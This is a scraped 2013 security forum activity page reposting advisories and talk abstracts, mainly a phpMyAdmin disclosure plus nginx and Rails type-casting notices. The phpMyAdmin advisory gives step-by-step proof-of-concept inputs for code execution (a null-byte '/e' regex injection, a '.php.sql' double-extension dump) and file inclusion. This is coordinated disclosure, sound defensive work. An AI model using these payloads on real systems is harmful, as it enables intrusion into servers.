PeStudio [TABLE=class: fborder] [TR] [TD=class: fcaption, colspan: 2, align: left]PeStudio 6.70 [/TD] [/TR] [TR] [TD=class: forumheader3]Author[/TD] [TD=class: forumheader3]Marc Ochsenmeier[/TD] [/TR] [TR] [TD=class: forumheader3]Author email[/TD] [TD=class: forumheader3] info©winitor.com[/TD] [/TR] [TR] [TD=class: forumheader3]Author website[/TD] [TD=class: forumheader3]winitor[/TD] [/TR] [TR] [TD=class: forumheader3]Description[/TD] [TD=class: forumheader3]PeStudio is a free tool which can be used to perform static analysis of any Windows application and reveals not only Raw-data, but also Indicators of Trust. Executable files analyzed with PeStudio are never started. For this reason, you can analyze suspicious applications with PeStudio with no risk! Depending on how it is started PeStudio has a Graphical User Interface (GUI) or a Character-Based User Interface (CUI), which is especially useful when performing batch-mode oriented parsing of executable files. PeStudio has a set of unique features like looking-up for the image being analyzed on Virustotal, the possibility to start new instances of PeStudio with the dependencies of the image. PeStudio does a RAW access to the data of the Windows Portable Executable format. No Windows API is used to gather elements. A feature which is also unique to PeStudio is the ability to create an XML report of the image being analyzed.[/TD] [/TR] [TR] [TD=class: forumheader3]Image[/TD] [TD=class: forumheader3]no image available [/TD] [/TR] [TR] [TD=class: forumheader3]Filesize[/TD] [TD=class: forumheader3]380 kB[/TD] [/TR] [TR] [TD=class: forumheader3]Date[/TD] [TD=class: forumheader3]Tuesday 23 April 2013 - 08:56:45[/TD] [/TR] [TR] [TD=class: forumheader3]Downloads[/TD] [TD=class: forumheader3]86[/TD] [/TR] [TR] [TD=class: forumheader3]Download[/TD] [TD=class: forumheader3] [/TD] [/TR] [/TABLE] Sursa: PeStudio 6.70 / Portable Executable Tools / Downloads - Tuts 4 You

April 26, 2013

phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities

Nytro posted a topic in Exploituri

[h=1]phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities[/h] [waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin =============================================================================== Author: Janek Vind "waraxe" Date: 25. April 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-103.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL. http://www.phpmyadmin.net/home_page/index.php ############################################################################### 1. Remote code execution via preg_replace() in "libraries/mult_submits.inc.php" ############################################################################### Reason: 1. insufficient sanitization of user data before using in preg_replace Attack vectors: 1. user-supplied parameters "from_prefix" and "to_prefix" Preconditions: 1. logged in as valid PMA user 2. PHP version < 5.4.7 (Newer versions: Warning: preg_replace(): Null byte in regex) PMA security advisory: PMASA-2013-2 CVE id: CVE-2013-3238 Affected phpMyAdmin versions: 3.5.8 and 4.0.0-RC2 Result: PMA user is able to execute arbitrary PHP code on webserver Let's take a look at the source code: Php script "libraries/mult_submits.inc.php" line 426 (PMA version 3.5.8): ------------------------[ source code start ]---------------------------------- case 'replace_prefix_tbl': $current = $selected[$i]; $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current); $a_query = 'ALTER TABLE ' . PMA_backquote($selected[$i]) . ' RENAME ' . PMA_backquote($newtablename) ; // CHANGE PREFIX PATTERN $run_parts = true; break; case 'copy_tbl_change_prefix': $current = $selected[$i]; $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current); $a_query = 'CREATE TABLE ' . PMA_backquote($newtablename) . ' SELECT * FROM ' . PMA_backquote($selected[$i]) ; // COPY TABLE AND CHANGE PREFIX PATTERN $run_parts = true; break; ------------------------[ source code end ]------------------------------------ We can see, that PHP variables "$from_prefix" and "$to_prefix" are used in preg_replace function without any sanitization. It appears, that those variables are coming from user submitted POST request as parameters "from_prefix" and "to_prefix". It is possible to inject e-modifier with terminating null byte via first parameter and php code via second parameter. In case of successful exploitation injected PHP code will be executed on PMA webserver. Tests: 1. Log in to PMA and select database: http://localhost/PMA/index.php?db=test&token=25a6ce9e288070bd28c3f9aebffad1b8 2. select one table from database by using checkbox and then select "Replace table prefix" from select control "With selected:". 3. We can see form named "Replace table prefix:" with two input fields. Type "/e%00" to the "From" field and "phpinfo()" to the "To" field. 4. Activate Tamper Data Firefox add-on: https://addons.mozilla.org/en-us/firefox/addon/tamper-data/ 5. Click "Submit", Tamper Data pops up, choose "Tamper". 6. Now we can modify POST request. Look for parameter "from_prefix". It should be "%2Fe%2500", remove "25", so that it becomes "%2Fe%00". Click "OK" and Firefox will send out manipulated POST request. 7. We are greeted by phpinfo function output - code execution is confirmed. PMA version 4.0.0-RC2 contains almost identical vulnerability: Php script "libraries/mult_submits.inc.php" line 482 (PMA version 4.0.0-RC2): ------------------------[ source code start ]---------------------------------- case 'replace_prefix_tbl': $current = $selected[$i]; $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current); $a_query = 'ALTER TABLE ' . PMA_Util::backquote($selected[$i]) . ' RENAME ' . PMA_Util::backquote($newtablename); // CHANGE PREFIX PATTERN $run_parts = true; break; case 'copy_tbl_change_prefix': $current = $selected[$i]; $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current); $a_query = 'CREATE TABLE ' . PMA_Util::backquote($newtablename) . ' SELECT * FROM ' . PMA_Util::backquote($selected[$i]); // COPY TABLE AND CHANGE PREFIX PATTERN $run_parts = true; break; ------------------------[ source code end ]------------------------------------ ############################################################################ 2. Locally Saved SQL Dump File Multiple File Extension Remote Code Execution ############################################################################ Reason: 1. insecure names of locally saved dump files Attack vectors: 1. user-supplied POST parameter "filename_template" Preconditions: 1. logged in as valid PMA user 2. configuration setting "SaveDir" defined and pointed to directory, which is writable for php and directly accessible over web (by default "SaveDir" is empty and PMA is secure) 3. Apache webserver with unknown MIME for "sql" extension PMA security advisory: PMASA-2013-3 CVE id: CVE-2013-3239 Affected are PMA versions 3.5.8 and 4.0.0-RC2 There is a security weakness in a way, how PMA handles locally saved database dump files. It is possible, that saved dump file has multiple extensions and if Apache webserver does not know MIME type of "sql" extension (that's how it is by default), then for example "foobar.php.sql" file will be treated as php file. More information: http://httpd.apache.org/docs/2.2/mod/mod_mime.html section "Files with Multiple Extensions" http://www.acunetix.com/websitesecurity/upload-forms-threat/ section "Case 4: Double extensions (part 1)" Test: 1. activate export to local server, be sure, that directory is writable: $cfg['SaveDir'] = './'; 2. select database for test, insert row into table with included php code like "<?php phpinfo();?>" 3. try to export that database or table, you have now additional option: "Save on server in the directory ./" Confirm that option, let the format be as "SQL". "File name template" change to "@DATABASE () php" and click "Go" button. Server responds with "Dump has been saved to file ./test.php.sql." 4. Request created file with webbrowser: http://localhost/PMA/test.php.sql In case of success we can see output of phpinfo() function, which confirms remote code execution. ############################################################################### 3. Local File Inclusion in "export.php" ############################################################################### Reason: 1. insufficient sanitization of user data before using in include_once Attack vectors: 1. user-supplied POST parameter "what" Preconditions: 1. logged in as valid PMA user 2. PHP must be < 5.3.4 for null-byte attacks to work PMA security advisory: PMASA-2013-4 CVE id: CVE-2013-3240 Affected is PMA version 4.0.0-RC2 Php script "export.php" line 20: ------------------------[ source code start ]---------------------------------- foreach ($_POST as $one_post_param => $one_post_value) { $GLOBALS[$one_post_param] = $one_post_value; } PMA_Util::checkParameters(array('what', 'export_type')); // export class instance, not array of properties, as before $export_plugin = PMA_getPlugin( "export", $what, 'libraries/plugins/export/', array( 'export_type' => $export_type, 'single_table' => isset($single_table) ) ); ------------------------[ source code end ]------------------------------------ We can see, that user-supplied parameter "what" is used as second argument for the function PMA_getPlugin(). Let's follow execution flow: Php script "libraries/plugin_interface.lib.php" line 20: ------------------------[ source code start ]---------------------------------- function PMA_getPlugin( $plugin_type, $plugin_format, $plugins_dir, $plugin_param = false ) { $GLOBALS['plugin_param'] = $plugin_param; $class_name = strtoupper($plugin_type[0]) . strtolower(substr($plugin_type, 1)) . strtoupper($plugin_format[0]) . strtolower(substr($plugin_format, 1)); $file = $class_name . ".class.php"; if (is_file($plugins_dir . $file)) { include_once $plugins_dir . $file; ------------------------[ source code end ]------------------------------------ As seen above, second argument "$plugin_format" is used in variable "$file" and after that in functions is_file() and include_once(). No sanitization is used against user submitted parameter "what", which leads to directory traversal and local file inclusion vulnerability. In case of older PHP version it may be possible to use null byte attack and include arbitrary files on server. ############################################################################### 4. $GLOBALS array overwrite in "export.php" ############################################################################### Reason: 1. insecure POST parameters importing Attack vectors: 1. user-supplied POST parameters Preconditions: 1. logged in as valid PMA user PMA security advisory: PMASA-2013-5 CVE id: CVE-2013-3241 Affected is PMA version 4.0.0-RC2 Php script "export.php" line 20: ------------------------[ source code start ]---------------------------------- foreach ($_POST as $one_post_param => $one_post_value) { $GLOBALS[$one_post_param] = $one_post_value; } PMA_Util::checkParameters(array('what', 'export_type')); ------------------------[ source code end ]------------------------------------ We can see, that arbitrary values in $GLOBALS array can be overwritten by submitting POST parameters. Such way of input data importing can be considered as very insecure and in specific situation it is possible to overwrite any variable in global scope. This can lead to many ways of exploitation. Below is presented one of the possibilities. Php script "export.php" line 59: ------------------------[ source code start ]---------------------------------- $onserver = false; $save_on_server = false; ... if ($quick_export) { $onserver = $_REQUEST['quick_export_onserver']; } else { $onserver = $_REQUEST['onserver']; } // Will we save dump on server? $save_on_server = ! empty($cfg['SaveDir']) && $onserver; ... // Open file on server if needed if ($save_on_server) { $save_filename = PMA_Util::userDir($cfg['SaveDir']) . preg_replace('@[/\\\\]@', '_', $filename); ... if (! $file_handle = @fopen($save_filename, 'w')) { $message = PMA_Message::error( ... /* If we saved on server, we have to close file now */ if ($save_on_server) { $write_result = @fwrite($file_handle, $dump_buffer); fclose($file_handle); ------------------------[ source code end ]------------------------------------ As seen above, when configuration setting "SaveDir" is set, then it is possible to save database dump to the PMA webserver. By default "SaveDir" is unset and this prevents possible security problems. As we can overwrite any variables in global scope, it is possible to set "SaveDir" to arbitrary value. This will lead to directory traversal vulnerability - attacker is able to save database dump to any directory in webserver, if only filesystem permissions allow that. Database dump can be with extension ".sql". If attacker can dump database with php code and tags in it, this content will be in dump file. If filename is something like "foobar.php.sql", then by default most Apache webserver installations will try to parse this dump file as php file, which can finally lead to the remote code execution vulnerability. Disclosure timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 16.04.2013 -> Sent email to developers 16.04.2013 -> First response email from developers 16.04.2013 -> Sent detailed information to developers 24.04.2013 -> New PMA versions and security advisories released 25.04.2013 -> Current advisory released Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe () yahoo com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------ Sursa: phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities

April 26, 2013

Hitb 2012 - Defibrilating Web Security

Nytro posted a topic in Tutoriale video

Hitb 2012 - Defibrilating Web Security Description: PRESENTATION ABSTRACT: Whether you are a consultant or a software engineer, you have probably realized by now that we're not really making a lot of progress on server-side web security. Consultants benefit from the resulting job security and developers want to focus on building awesome technology without spending a lot of time and energy building reusable security solutions, which are hard. Come and hear about the fallacies of the current approaches and a couple of ideas no how to address some of them. Among other things, this talk will introduce you to contextual runtime taint tracking system with PoCs in Java and Ruby. ABOUT MEDER KYDYRALIEV Meder has been working in the area of application security for nearly a decade. He's poked at, broken, and helped fix a lot of code businesses and parts of the Internet depends on (Struts2, JBoss Seam, Google Web Toolkit, and Ruby on Rails, to name a few). Some of the things that excite him include: karaoke, server-side security, kumys and making software security easier. Sursa: Hitb 2012 - Defibrilating Web Security

April 26, 2013

Hitb 2012 - Hackers The Movie: A Retrospective

Nytro posted a topic in Tutoriale video

Hitb 2012 - Hackers The Movie: A Retrospective Description: PRESENTATION ABSTRACT: In this lecture, Don A. Bailey will take a look back at another great milestone in information security: the movie Hackers. In this retrospective, Don will analyze every "hack" implemented in the cult classic and demonstrate how in modern day these attacks are even more relevant, realistic, and cost effective. Don will discuss the exact technologies used in modern day versions of these exploits and what tactical requirements are no longer glass ceilings for attackers. Mr. Bailey will also provide demonstrations that show low cost and creative ways to bypass physical security controls. Using simple, modern, and sometimes even even rudimentary technology, demonstrations will show that no matter how complex a security control may be there is always a fast and effective bypass. Oh, and by the way... Hack the Planet. ABOUT DON BAILEY Don A. Bailey is an internationally respected security researcher known for breaking ground in the mobile and embedded security spaces. Don has given over thirty unique lectures on various advances in security technology over the last eight years, both around the world and within the United States. His research has been highlighted on news exchanges such as CNN, Reuters, NPR, BBC, FOX, and CBS. Don was recently featured in the IEEE Security & Privacy magazine for his recent work reverse engineering M2M systems such as vehicle security modules. Previously the Research Director for a prestigious security firm, Mr. Bailey recently founded the consulting and engineering organization Capitol Hill Consultants LLC. At CHC, Don focuses on government contracting, global defense-centric engagements, and mobile security consulting. Sursa: Hitb 2012 - Hackers The Movie: A Retrospective

April 26, 2013

Hitb 2012 - A. Barisani And D. Bianco - Practical Exploitation Of Embedded Systems

Nytro posted a topic in Tutoriale video

Hitb 2012 - A. Barisani And D. Bianco - Practical Exploitation Of Embedded Systems Description: PRESENTATION ABSTRACT: For the 10th anniversary of HITB we keep it old school with an in-depth exploration of the reverse engineering and exploitation of embedded systems. We will cover hardware by showing how to identify and probe debugging and I/O ports on undocumented circuit board layouts. We will cover software by exploring the analysis, reverse engineer and binary patching techniques for obscure real time OSes and firmware images with real world examples. We are also going to address the post compromise art of debugging and patching running live kernels with custom backdoors or interception code. At least one Apple laptop embedded subsystem will be harmed during the course of the presentation. ABOUT ANDREA BARISANI Andrea Barisani is an internationally known security researcher. Since owning his first Commodore-64 he has never stopped studying new technologies, developing unconventional attack vectors and exploring what makes things tick...and break. His experiences focus on large-scale infrastructure administration and defense, forensic analysis, penetration testing and software development, with more than 10 years of professional experience in security consulting. Being an active member of the international Open Source and security community he contributed to several projects, books and open standards. He is now the founder and coordinator of the oCERT effort, the Open Source Computer Security Incident Response Team. He has been a speaker and trainer at BlackHat, CanSecWest, DEFCON, Hack In The Box, PacSec conferences among many others, speaking about TEMPEST attacks, SatNav hacking, 0-days, OS hardening and many other topics. ABOUT DANIELE BIANCO He began his professional career during his early years at university as system administrator and IT consultant for several scientific organizations. His interest for centralized management and software integration in Open Source environments has focused his work on design and development of suitable R&D infrastructure. One of his hobbies has always been playing with hardware and electronic devices. At the time being he is the resident Hardware Hacker for international consultancy Inverse Path where his research work focuses on embedded systems security, electronic devices protection and tamperproofing techniques. He presented at many IT security events and his works have been quoted by numerous popular media. Sursa: Hitb 2012 - A. Barisani And D. Bianco - Practical Exploitation Of Embedded Systems

April 26, 2013

Social Engineering – Art Of Human Brain Manipulation

Nytro posted a topic in Tutoriale video

Social Engineering – Art Of Human Brain Manipulation Description: Talk: SOCIAL ENGINEERING – Art of human brain manipulation Speaker: Muhammed Sherif Abstract: Social engineering is a common thing what we do among our friends, relatives etc.. .Its all about gaining information of a person ,Which sounds “not so bad” in REAL LIFE. But it can be much dangerous when it come to the cyberspace . Social Engineering is a divine art of manipulating the Human brains to reveal the confidential information which can be used to attack themselves.Its a trickery process for information gathering .The attacks like Pretexting,Web phishing,IVR (Interactive Voice Responses) or Phone phishing ,Baiting,Something for something,Piggybacking etc …. . Sursa: Social Engineering – Art Of Human Brain Manipulation

April 26, 2013

Android Forensics

Nytro posted a topic in Tutoriale video

Android Forensics Description: Talk: Android Forensics Speaker: Nikhalesh Singh Bhadroia Android is currently the world’s most popular smartphone operating system it’s already over 72 percent of market. This kind of popularity traditionally draws the eye of security researchers and attackers alike. Android presents a number of challenges to forensic practitioners. so here i’am providing Forensic Techniques. Sursa: Android Forensics

April 26, 2013

Hacking IPv6 Networks

Nytro posted a topic in Tutoriale in engleza

Hacking IPv6 Networks Authored by Fernando Gont These are the slides for the "Hacking IPv6 Networks" security training course as given at BRUCON 2012. Download: http://packetstormsecurity.com/files/download/121415/fgont-brucon2012-hacking-ipv6-networks-training.pdf Sursa: Hacking IPv6 Networks ? Packet Storm

April 26, 2013

nginx Integer Overflow

Nytro posted a topic in Exploituri

nginx Integer Overflow Authored by Safe3 | Site safe3.com.cn Qihoo 360 Web Security Research Team discovered a critical vulnerability in nginx. The vulnerability is caused by a integer overflow error within the Nginx ngx_http_close_connection function when r->count is less then 0 or more then 255, which could be exploited by remote attackers to compromise a vulnerable system via malicious http requests. Website: http://safe3.com.cn I. BACKGROUND --------------------- Nginx is an HTTP and reverse proxy server, as well as a mail proxy server, written by Igor Sysoev. For a long time, it has been running on many heavily loaded Russian sites including Yandex, Mail.Ru, VKontakte, and Rambler. According to Netcraft nginx served or proxied 12.96% busiest sites in April 2013. Here are some of the success stories: Netflix, Wordpress.com, FastMail.FM. II. DESCRIPTION --------------------- Qihoo 360 Web Security Research Team discovered a critical vulnerability in nginx. The vulnerability is caused by a int overflow error within the Nginx ngx_http_close_connection function when r->count is less then 0 or more then 255, which could be exploited by remote attackers to compromise a vulnerable system via malicious http requests. III. AFFECTED PRODUCTS --------------------------- Nginx all latest version IV. Exploits/PoCs --------------------------------------- In-depth technical analysis of the vulnerability and a fully functional remote code execution exploit are available through the safe3q@gmail.com In src\http\ngx_http_request_body.c ngx_http_discard_request_body function,we can make r->count++. V. VUPEN Threat Protection Program ----------------------------------- VI. SOLUTION ---------------- Validate the r->count input. VII. CREDIT -------------- This vulnerability was discovered by Safe3 of Qihoo 360. VIII. ABOUT Qihoo 360 --------------------------- Qihoo 360 is the leading provider of defensive and offensive web cloud security of China. IX. REFERENCES ---------------------- http://nginx.org/en/ Sursa: nginx Integer Overflow ? Packet Storm

April 26, 2013

Microsoft SQL Server and IBM DB2 data-type injection attacks

Nytro posted a topic in Exploituri

Microsoft SQL Server and IBM DB2 data-type injection attacks In the http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3221 entry, what we meant is that CVE-2013-3221 is exclusively about the behavior of Ruby on Rails as discussed in the listed MLIST:[rubyonrails-security] 20130207 reference. If a reference is about a data-type injection impact in an application other than a Ruby on Rails application, it should not be mapped to this CVE. However, an applicable reference about interaction between Ruby on Rails and Microsoft SQL Server (or interaction between Ruby on Rails and IBM DB2) should be mapped to this CVE. (There might be a misinterpretation that CVE-2013-3221 is only about interaction with MySQL. http://twitter.com/dakull/statuses/326633931636084736 possibly suggests that, but we're bringing this up mostly because of a comment that someone else sent directly to MITRE.) Common patterns used in Ruby on Rails applications could allow an attacker to generate SQL that, when combined with some database server's typecasting code, generates queries that match incorrect records. Note: This is a code and best-practise advisory, there is no patch to apply or updated version to install. Databases Affected: MySQL, SQLServer and some configurations of DB2 Not affected: SQLite, PostgreSQL, Oracle Outline - ------- When comparing two values of differing types most databases will either generate an error or return 'false'. Other databases will attempt to convert those values to a common type to enable comparison. For example in MySQL comparing a string with an integer will cast the string into an integer. Given that any string which isn't an invalid integer will convert to 0, this could allow an attacker to bypass certain queries. If your application has XML or JSON parameter parsing enabled, an attacker will be able to generate queries like this unless you take care to typecast your input values. For example: User.where(:login_token=>params[:token]).first Could be made to generate the query: SELECT * FROM `users` WHERE `login_token` = 0 LIMIT 1; Which will match the first value which doesn't contain a valid integer. This vulnerability affects multiple programming languages, and multiple databases, be sure to audit your other applications to see if they suffer the same issues. Work Arounds - ------------ There are two options to avoid these problems. The first is to disable JSON and XML parameter parsing. Depending on the version of rails you use you will have to place one of the following snippets in an application initializer Rails 3.2, 3.1 and 3.0: ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::XML) ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::JSON) Rails 2.3: ActionController::Base.param_parsers.delete(Mime::XML) ActionController::Base.param_parsers.delete(Mime::JSON) If your application relies on accepting these formats you will have to take care to explicitly convert parameters to their intended types. For example: User.where(:login_token=>params[:token].to_s) Fixes - ----- Unfortunately it is not possible for ActiveRecord to automatically protect against all instances of this attack due to the API we expose. For example: User.where("login_token = ? AND expires_at > ?", params[:token], Time.now) Without parsing the SQL fragments it is not possible to determine what type params[:token] should be cast to. Future releases of Rails will contain changes to mitigate the risk of this class of vulnerability, however as long as this feature is still supported this risk will remain. Credits - ------- Thanks to joernchen of Phenoelit for reporting this to us and to Jonathan Rudenberg for helping to review the advisory. - -- Cheers, Koz References: http://twitter.com/dakull/statuses/326633931636084736 http://seclists.org/oss-sec/2013/q2/170 http://cve.mitre.org/cve/request_id.html Sursa: Microsoft SQL Server and IBM DB2 data-type injection attacks - CXSecurity.com

April 26, 2013

Sign In

Nytro

Posts

Joined

Last visited

Days Won

Content Type

Profiles

Forums

Everything posted by Nytro

[JS] Detect antivirus

Google pays record $31K bounty for Chrome bugs

Windbg Tricks - Module Relocation

WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins

Practical HTTP Host header attacks

Sagan v0.3.0 Released

Aging networking protocols abused in DDoS attacks

Facebook Q1 Earnings: Striking Mobile Revenue Growth

Ce ascultati acum?

AudioCoder Buffer Overflow Exploit (SEH)

Problema semnatura

Hacking Windows Servers - Privilege Escalation

Tor calls for help as its supply of bridges falters

[C] Love letter (obfuscated C contest 1990)

Pen Testing SQL Servers With Nmap

PeStudio

phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities

Hitb 2012 - Defibrilating Web Security

Hitb 2012 - Hackers The Movie: A Retrospective

Hitb 2012 - A. Barisani And D. Bianco - Practical Exploitation Of Embedded Systems

Social Engineering – Art Of Human Brain Manipulation

Android Forensics

Hacking IPv6 Networks

nginx Integer Overflow

Microsoft SQL Server and IBM DB2 data-type injection attacks

Browse

Activity

Pages